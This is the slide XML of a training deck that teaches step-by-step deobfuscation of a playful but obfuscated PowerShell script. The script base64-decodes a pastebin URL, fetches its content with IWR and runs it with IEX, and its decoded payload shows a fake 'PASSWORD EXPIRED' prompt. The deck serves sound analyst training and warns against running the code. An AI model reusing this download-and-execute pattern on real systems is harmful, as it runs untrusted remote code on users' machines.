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0" r:id="rId2"/>
    <p:sldId id="311" r:id="rId3"/>
    <p:sldId id="313" r:id="rId4"/>
    <p:sldId id="312" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="271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7" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="286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A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73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19114-FC23-4898-A122-E7E70AC61D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FB56D-CFD3-410F-BE06-E481575504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EA2B2-E934-4F39-8D11-BC6224792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601FC-2406-48BB-8694-27E2BC7E5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7C69D-0E88-4719-AE06-DDAEEB1C7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59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BABCD-9628-4F72-94F5-C74FF7910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F2DE83-1C0C-4F6C-A54F-DF71BD5261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60998-5D77-4572-A1E5-4AC28BB7F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9FB85-4079-45BE-84F0-ADDFC0DCB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BBC75-D66B-4919-AFE9-94D4BDDF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89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A1870-F1EB-4DFB-B947-81B38FF2E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58AAAF-BA8E-47DD-A7C8-D3D659616B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C96CC-CD0B-41AD-ACAB-38001FDBC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6EC8A-7E4D-4E87-B0A7-A09A5DBC1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0163E-3170-4669-89F9-160B17B6F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717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FFA8E-596D-46C5-9507-4EED2E6E7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DB20C-E82C-4184-BB9C-3A6E65787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5AC59-6776-42E2-9C66-4FFCA7C6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2B279-3720-4D47-B3FB-313C81D17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FD39E-2A07-4895-806D-AB2AEDC02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88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965E4-710C-4B9A-A89F-A1AC39ABF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0AAB4-4A86-4CCD-8270-1D535DE97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277A3-7587-4527-BEB2-D260251C9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781B7-86BC-4BBE-94CA-0AB7DA306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F29F3-6A23-47E5-A4F8-E4CE37F70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339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F40D9-0F20-472E-BC37-335A49EAE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E3ECF-DF18-4D80-8727-B0219346E9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B9424-86F6-475D-B6D8-1D3299C288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1E172A-E6AD-4A33-844A-F1B174A11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47BA4-BAEF-406B-A6B9-B6093B9E0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0323B-3FEB-40F2-A225-05437CD4C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23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FB9E8-E135-48DA-B42F-25FC87E5B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1D361-0AE3-4A8E-8D30-B189B45DC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97EDA-B3D5-4029-B41F-332474471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42310D-DF09-4547-A623-1C443E4848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0E7A0A-F143-42D0-8A45-4BCBC11477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C3D86D-E608-499F-9BA7-025470074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0E67B7-EEA8-42DB-A1B2-44C652281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6BD705-6AC4-45BC-8833-2B53109D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6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59333-F7A5-4224-BD04-2787A3749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3DDE82-FBF3-40F9-95FC-71452509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D3FA9-EB2E-4545-9977-5D16BCA04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E7ACD6-3880-4AAC-90CE-C01693391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27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C20494-890C-46F4-81A3-099F927B4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0075E0-ACE2-4556-A66B-58F388A6B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48F5A2-410A-49F4-9682-C90800E48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44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D7CC1-98B9-480D-A360-CA27D8DA9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90D65-B0DD-4C6A-8CF8-05EE70582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3DBF8D-8ECF-4B9A-97B9-089CDB267A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5D016-83E3-4BB0-8BCE-702445A88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62141E-6242-4469-8D5C-A42531FB2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132F67-E37F-4642-BA96-1507B7EAD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53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4CCFC-1129-446D-83EE-F8AF2F8F4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EE52B1-E95E-4A1B-B8EC-4A0C4F87CA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3ACD6C-DCE4-466E-90E1-846DA9E85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1D8B5-EE28-43D3-8114-5B3CDC99C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02821-B4EA-4AD2-945E-2975A4454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FA31D8-A693-4A47-957E-B358E2DF4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3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1E4E19-0570-4C1C-B4C6-F21EDAAD5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9C7BE8-01C4-49C9-BCB8-0E2ED64F1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F8BC6-DE2B-4DF7-B7CF-2ACD454B5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CF63C-2087-4992-BC77-A9637573CDE5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A02B2-684A-4F93-A372-9543463198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E85F6-779A-4C83-8178-926815927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82B6-7793-48CE-9329-8A2C5587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94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ocs.microsoft.com/en-us/dotnet/api/microsoft.powershell.commands.basichtmlwebresponseobject?view=powershellsdk-7.0.0" TargetMode="Externa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ocs.microsoft.com/en-us/dotnet/api/microsoft.powershell.commands.basichtmlwebresponseobject?view=powershellsdk-7.0.0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docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2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en-us/dotnet/api/system.net.networkcredential.-ctor?view=net-6.0#system-net-networkcredential-ctor(system-string-system-security-securestring)" TargetMode="Externa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622926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TL;DR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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 descr="A picture containing text, electronics, display, screenshot&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D15E82-2198-4543-AB26-4C7518573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55" y="654997"/>
            <a:ext cx="11238689" cy="620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791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A3E22E6-1856-4CAE-93A4-2634BA541A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014141" y="2799995"/>
            <a:ext cx="3932030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3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="12ACDC"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu" panose="020B0504030602030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create Plan</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" b="1" dirty="0">
              <a:latin typeface="Ubuntu" panose="020B0504030602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FE3579-415C-4574-BAF7-1CB9490E6AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1498060" y="3597567"/>
            <a:ext cx="2976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Think small bite-size pieces.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175440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Divide and Conquer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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2904262" y="2083035"/>
            <a:ext cx="6407287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Group items into small chunks or tasks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Make an action items list of those groups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Reorder the groups</a:t>
            </a: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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Prioritize quick-win translations over more complex statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2193861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Divide and conquer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976822" y="1863738"/>
            <a:ext cx="10327857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did we notice in our previous inspection step?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have 5 functions we have to figure out what they do and how they inter-connect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How does this code run?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have base64 decoding with "FromBase64String"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see "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System.Net.NetworkCredential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"; which sounds like it's asking/taking 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networkcredentials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 from somewhere?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see something using "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ConvertTo-SecureString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", not sure for what yet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,Sans-Serif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need to figure out what order we want to investigate the things above</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3673677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Divide and Conquer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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854739" y="2220977"/>
            <a:ext cx="8482520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This is the general order we want to work through the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="704850" marR="0" lvl="2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Identify what the functions do?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704850" marR="0" lvl="2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AutoNum type="arabicPeriod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704850" marR="0" lvl="2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Figure how the code is supposed to flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="704850" marR="0" lvl="2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AutoNum type="arabicPeriod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704850" marR="0" lvl="2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Decode everything (i.e. if we have nested code it will likely be inside the base64 data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="704850" marR="0" lvl="2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AutoNum type="arabicPeriod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704850" marR="0" lvl="2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Figure out all the small details of what is happening on each line (prioritize quick wins)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800B1141-1A98-4A8B-AC61-7626289EE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749" y="4666865"/>
            <a:ext cx="2608500" cy="196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681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A3E22E6-1856-4CAE-93A4-2634BA541A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922635" y="1250575"/>
            <a:ext cx="4604274" cy="4163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GB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Analyze</a:t>
            </a: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 &amp; Annotate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="80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FE3579-415C-4574-BAF7-1CB9490E6AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293224" y="860612"/>
            <a:ext cx="4797909" cy="5023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Google is your friend.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3300196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(rainbow)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2939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First function is "rainbow"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Rainbow takes in one input and return one output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two methods, "FromBase64String" and "UTF8.GetString". Let's Google these to find out what they do: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Microsoft docs tells me FromBase64String converts base64 data into an 8-bit unsigned integer array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Microsoft docs tells me UTF8.GetString converts the integer array into a UTF8 human-readable string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7117048C-5E1E-4BD0-B25A-9140839BB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64" y="5055303"/>
            <a:ext cx="10526484" cy="119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971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(rainbow)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1831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50403060203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Putting it all together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know that "rainbow" takes in a base64encoded data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It decodes the base64 data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Returns the string representation of that base64 data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9" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A612EF-80E8-456E-B5FA-189FC7470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24" y="4059027"/>
            <a:ext cx="11140751" cy="139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021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1831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Next function is "butterfly"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Butterfly doesn't take in an input, but does return one output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 see a lot more going on here, let's step through it to unpack what is going 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0E659A13-EC3A-4056-B8BB-E7288602C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805" y="3429000"/>
            <a:ext cx="10236199" cy="284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24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First, we see two variables are defined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actually don't quite know what these will be used for yet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56FF30AC-DB9A-40E7-AE12-212FA8326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18" y="2724764"/>
            <a:ext cx="11207376" cy="311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141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3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D7C51007-9536-4F6D-94D9-F94FB3B75810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="2013404"/>
            <a:ext cx="4391025" cy="2831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One of the variables, "$monarch", looks like it might be base64 data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can try to run this in Cyber Chef, to see what we get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Turns out it's not base64 data...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5000000000000000000" pitchFamily="2" charset="2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We'll have to inspect more of the code to figure out what this is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593DC0-CA6B-4BEC-813F-3582058D3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8047" y="1315289"/>
            <a:ext cx="6911788" cy="492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182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622926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TL;DR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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965306-C79A-4384-A7B6-39466E83A5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796375" y="0"/>
            <a:ext cx="6096000" cy="6878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b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function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rainbow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$sunshine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 {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$glitter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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Text.Encoding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]::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UTF8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GetString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([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Convert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]::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FromBase64String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$sunshine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C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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$glitter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}</a:t>
            </a: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$kisses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'aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3dMMFFYcXJx'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rainbow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$kisses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$kisses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"18,27,89,76,45,123,91,73,1,5,8,6,15,2,3,7"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-split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','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$monarch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76492d1116743f0423413b16050a5345MgB8ACsATgB1AGwATgBKAHAASwBaAFIAWABFAHcAVQBNAFUAQQBaAHoAOABrAGcAPQA9AHwANwBiADAAOAAwAGMAZgA3ADcANgA2ADIAMABjADkANwA2ADUANwA5ADAAZQAxAGUANwA0ADAAOQAzADUAMQBiADIANgAwAGQAMAA3ADgANgA1ADEANwAwADUAOQBhADIANwAzAGYAZQA1ADgAYgA3ADgAYgAzAGQANgBiAGUANABiADEAMgAzAGMAYQAxADMANgBjADAANwBhADkANwA0ADYAMAA1ADYAYgBjAGQAOQBmADQANAAxAGEAYgAwADIANAAzADkAOQBkAGMAZQA3ADAANQAwADkAZAA5ADEAYQA0ADAAZgA3AGEAMgBlAGIAYgBmADQAZgBlADgAZQBhADEAOABkADMAOQBhAGQAMABkADYAYQA3ADkANAAxAGYAZQAyADUAYwA5AGIAYwA2ADgAYwA1ADQANABkAGUAZgBjADMAMAA2AGUAYQBlADIAYQA0AGEAYQBlADcAYQBjADUANQA0ADgAZABiADkAMQBmADEAOQAyADcAZgA0AGUAOABmADYAOQBlAGIAOAAzAGEAZAA3ADAAZgBjADYAZABkADgAZABmAGYAMQBhADQAZgBiADAANAAzAGUAMAA1ADQAMAA3ADMAMABkADUANgA3ADEAYgBmADkANQAwADYANAA5AGQAMAAzADQAYwA3AGIAOQAxADcAMQBjADYAZAA2AGMAZABkADYAMwBjADAAZAA0AGMAZAAxADAAYQAwAGEAZQAwADEAOQAxAGEAMQAyAGQANABkAGIANQBmAGMANwA4AGUANgA0ADEAZgA4ADcAMABhAGYAYgAxADEANQBhAGMAYgAxAGIAOAAyADcAMQA2ADAANQA3ADEAZQAzADgAYgBjADYAOAA5AGUANQA4AGYAOQBlAGYAYgAyADAAYgBjADIAMQAwADgAZQAwADgAZgA2AGEANgA4AGEAMQA1AGQAZgBlADIAZgBhADMAOAAxAGMANQBjAGIAZQAwADUANAAwADEAMQAwAGYAZgBiAGUANQA4ADQAMwBkADcAZAA4AGUAMAA3ADEAMwAzAGYAOQA2ADgAOABkAGEANAAxAGYAMgAxAGYANwA5ADEAZABhADUAYwAzADYAOQAzADgAMwBiAGUANQAzAGIAMABkADIAZABjAGQAYgBkAGQANgBlADMAMgA4AGIAZgA4ADkAOAAwADIANgA1ADYAZgAwAGUAYwA2AGUAMgBkAGEAMgBiADIAMAA4ADEAZQAyADEANQA1AGMAZABhADkAMABhADYAZQA5AGQAMAA0ADYAZgBhADUAYQAzADkAYgA4AGYAOQBhADkAMwBkADQAZgAyADMAYQA0ADAANgAwADUAMwA4ADkAZgAwADIANwAyAGIAZgBhADQAYgA4ADYANgAyAGUANwA1ADYAZABkADYAMgA0AGUAZQBhADkAOAAyADAAYQBjAGYAYQAyAGUANwA5AGIAYgA5AGQAZABiADIANgBjAGQAZAA3ADIANABhADYANwBmADkANABjADcAMgBmADUAOAAzADYAMwBhAGUAOABlADgAMQAwAGIANAA0ADgAMwAyAGEANgAyAGMAZQA3ADUAMwAwADcAMwA1ADgAMAAyAGIAYwBkAGYAOABjADQANwA4ADIAMgBjADkAMAAyADAANQBkAGIAMgBlADEAYQBjADQAZABlADkAMwBiADkAMwAwAGYAMQBkAGMAMQA2AGYAZgA0ADUANwBiAGEAYwBlADQAZQA3ADQANgA4AGEAMAA1AGQANwBmADkAOQAzADgANQA5ADQAYQA0AGMAZgAxADMAZgBjADUANgA2ADMANgBmADIAMAAwADYAOQBjAGQAYQBmADYAOABiADQAZQA5AGEANwA2AGMAZQBmADUAZQBlAGUAMQA2AGEAZABlADIAMgAyADEAMQA5AGYAOQAxADAAOAA2AGEANwBmADQAMwA3ADMAZQAzADIAZgBkADMAOABjAGQAOABlAGEAYgBjADUAZABjAGIAYgBlAGYAMABkADkAYgA1AGIAYwBlAGEAMwA2ADEAMQBiADEANQAxADUANwBiADEAOQA4ADAAYQBjADgAYwA0AGEAOQBlAGYAZQA1AGQAYQA3ADgAYQA4AGYAOQA5AGEANgBkAGYAYgA3AGEAMwBlADMANgBkAGYAOAA2ADIAMwBkADAAMgBlADgAZAA0AGUAMgA2ADkAMwA4AGUAYwBlAGQAMABlADIAMwA5ADIAZQBjADgANQBiADkAZgA5ADUAZABjAGUAMwBjADkANQBjADkANwA4AGEANwBmADQAMABlAGYAMgBhADcAOQAzADgANABiADUANAA1AGUANgAzAGMAMgBiADEAYwAyADMAYwA3ADgAMgA5ADYAZQAyAGEAMgAyADEAMwA1AGQANgAwADkAZgAyADIAOQBmADkAYgA1AGQAMwBiADYAMwAwADEAMgAwADAAZgAyADgANgBiADYAYQA0AGUAMQAwAGYAYwBjADcAYwBhAGUAYgA2AGEAYwAzADYAZABiADIAMQA3AGMAOQBlADIAMwBiADYAZABjADgANQA4AGUANAA2AGEANQBhADQANQBjAGUAOQBkADQAOQBmADcANQAzAGQAOAAzADUAOAAzADcAMQAzADcAMQBjAGYAYwAyADEANABlAGUAZQAzAGMAYwA0ADgAYgBlADEAMAAyADQAZQA1ADgANAAxADYAMQAyAGMAMwAzAGYAMABjAGYAZQAwADkANwA3ADYAYgA3ADMAMgAxADQANgBhAGIAYwBkADEANAA2ADMAZgA0AGMAZAA4AGEANQBjADQA'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5604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2846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Next, we see some complex statements, we can step through one at a time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This is a good example of when to split a statement up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lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="1" indent="-177800">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0070AD"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"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can use a backtick character ("`") to break the statement up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 see the use of a pipe character "|", so this tells me we're feeding the output of the first half into the input of the second half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pic>
        <p:nvPicPr>
          <p:cNvPr id="9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CE03095-FBD1-4B44-9D08-04DE3823A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094" y="4467195"/>
            <a:ext cx="10580914" cy="139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26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first half, I see some string formatting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Denoted the curly braces with numbers inside and the "-f", this the syntax for string formatting in PowerShell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shuffle the strings around, using order seen below (2 -&gt; 0 -&gt; 1), we have "IWR" which is PowerShell shorthand for Invoke-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WebRequest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 see a call to our "rainbow" function, which if we recall is how we base64 decode something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We're sending "$float" into base64 decode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can use Cyber Chef to decode this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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CE03095-FBD1-4B44-9D08-04DE3823A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48" y="4714457"/>
            <a:ext cx="10580914" cy="139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71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91B9F7CF-D7BF-456E-983F-591368B8F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418" y="1244870"/>
            <a:ext cx="9395162" cy="544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359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Simplify</a:t>
            </a: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20B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§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Can you reduce the statement down to make it easier to work with?</a:t>
            </a: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20B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§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20B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§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It's helpful to make a copy of the code before editing, in case we mess something up</a:t>
            </a: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20B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§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20B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§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Substituting in the things we just learned, we get the following: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7" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7470E502-A1A5-46A5-8448-325E6D1BD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257" y="4008187"/>
            <a:ext cx="10145486" cy="132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483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Let's look at the second half of the statement,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pass in the contents of the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pastebin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 website to "Select-Object"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Looking up "Select-Object" from the MSDN docs page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Specifically, "-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ExpandProperty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 flag, will select a property that is chosen in this case "Content".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"Property" defines an object's property, in the case of IWR it returns a "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BasicHtmlWebResponseObject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", that has the property "Content" -- in other words, the content of the webpage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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/dotnet/api/microsoft.powershell.commands.basichtmlwebresponseobject?view=powershellsdk-7.0.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848074A4-AEAF-4091-BFD0-C46649C80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808" y="5026779"/>
            <a:ext cx="10145486" cy="132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2495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Let's look at the second half of the statement,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pass in the contents of the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pastebin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 website to "Select-Object"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Looking up "Select-Object" from the MSDN docs page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Specifically, "-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ExpandProperty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 flag, will select a property that is chosen in this case "Content".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"Property" defines an object's property, in the case of IWR it returns a "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BasicHtmlWebResponseObject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", that has the property "Content" -- in other words, the content of the webpage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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/dotnet/api/microsoft.powershell.commands.basichtmlwebresponseobject?view=powershellsdk-7.0.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848074A4-AEAF-4091-BFD0-C46649C80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808" y="5026779"/>
            <a:ext cx="10145486" cy="132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846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3770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First, I notice string formatting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Again, denoted by curly braces with numbers inside them, and a "-f" following it. This is the string-formatting syntax for PowerShell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So, if we do the same type of re-ordering that we did previously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For example, putting the string together 2-&gt;0-&gt;1, we get "IEX"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So, what the heck is IEX?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To the Googles!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IEX is another PowerShell short-hand for Invoke-Expression, which according to the MSDN docs page it "runs commands on the local computer"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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A52F60-F7A6-4D1E-9F95-1EABC790E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27" y="5610670"/>
            <a:ext cx="11583955" cy="39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35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223230" y="9144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WARNING!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IEX IS DANGEROUS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MUST NERF IEX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DELETE THIS AND DON'T RUN IT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A52F60-F7A6-4D1E-9F95-1EABC790E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21" y="4474190"/>
            <a:ext cx="11583955" cy="39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8719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223230" y="9144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122B00CA-493E-4041-88BD-21441C1F2524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590780" y="1447800"/>
            <a:ext cx="11220219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run, the NERFED command in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Powershell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, we get the following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can see that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System.Net.NetworkCredential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actually decodes our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SecureString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Which we can see is "rainbow" followed by more data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you recall, rainbow is our base64 decode function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Let's run this through Cyber Chef to see what we're working with</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F6F0CCF-CC38-4039-816E-1E280D9FD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30" y="2032367"/>
            <a:ext cx="11935899" cy="39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0469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After decoding the base64, we have the following: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226B3D5B-0FE9-4089-8325-D99C4E375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047" y="1844638"/>
            <a:ext cx="8420847" cy="458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160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622926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TL;DR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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965306-C79A-4384-A7B6-39466E83A5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1958503" y="277545"/>
            <a:ext cx="60960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secure_string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ConvertTo-SecureString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-k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$kisses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$monarch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encrypted_credentials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New-Object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System.Net.NetworkCredential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""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secure_string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$flower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encrypted_credentials.Password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$flower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decoded_flower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rainbow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'SSBhbSBhIGxpdHRsZSAtIDQgeWVhciBvbGQgcG9ueSAtIHRoYXQgZHJlYW1zIG9mIGJlaW5nIGEgdW5pY29ybi4gSSB3YW50IHRvIHBsYXkgYW5kIHJvbXAgYXJvdW5kIGluIHRoZSBza3kgZm9yIGxpa2UgMTB4IGEgZGF5LiBJIHdhbnQgdG8gcmlkZSByYWluYm93cyBhbmQgc2hvb3QgYnV0dGVyZmxpZXMgb3V0IG9mIG15IGhvcm4h'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decoded_flower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$colorful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decoded_flower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-split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‘’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="98C379"/>
              </a:solidFill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C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function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pony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{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$colorful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$01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69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8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4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26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65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13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120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13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 -join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''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$03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$04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45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$06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118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119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119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119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119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 -join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''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$07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$08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48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 -join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''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27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$10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118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$11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39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33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35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 -join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''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$13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"PASSWORD EXPIRED"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$14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4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 -join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''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$16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"Click here to change now."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$17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3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 -join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''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$18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" 10"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$20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164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 -join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''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$21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$trot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Fira Code" panose="020B0809050000020004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$22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"https://acegif.com/wp-content/gif/unicorn-80.gif"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C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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$01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$03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$04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$06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$07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$08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$09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$10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$11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$13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$14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$15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$16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$17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$18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$19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$20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$21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$22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17386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Updating our hypothesis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31AF5296-6B11-441C-84DD-6AC8CC04CA38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you recall, we had a hypothesis that "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System.Net.NetworkCredential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 would pull network information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After doing some of our analysis, turns out we were actually wrong about what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System.Net.NetworkCredential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was doing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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ED8BEAA-5013-4AD2-AFA1-BC9A25ED1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8" y="5379191"/>
            <a:ext cx="12133729" cy="395207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14699275-B6AD-4428-B155-243D1612F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624" y="1853315"/>
            <a:ext cx="5814526" cy="266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6868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223230" y="9144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D4B41A9F-E724-4B7E-8E52-75E9283405A0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So, what is going on?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Google what "System.Net.NetworkCredential" is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you might notice that Microsoft has a few different versions of what this does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Comparing this to our code, we see it pass some data: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First argument: "" -&gt; which is a String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Second argument: (ConvertTo-SecureString –k ($kisses) $monarch) -&gt; which returns a SecureString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So, we want to look at the second one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NetworkCredential(String, SecureString)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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 6" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
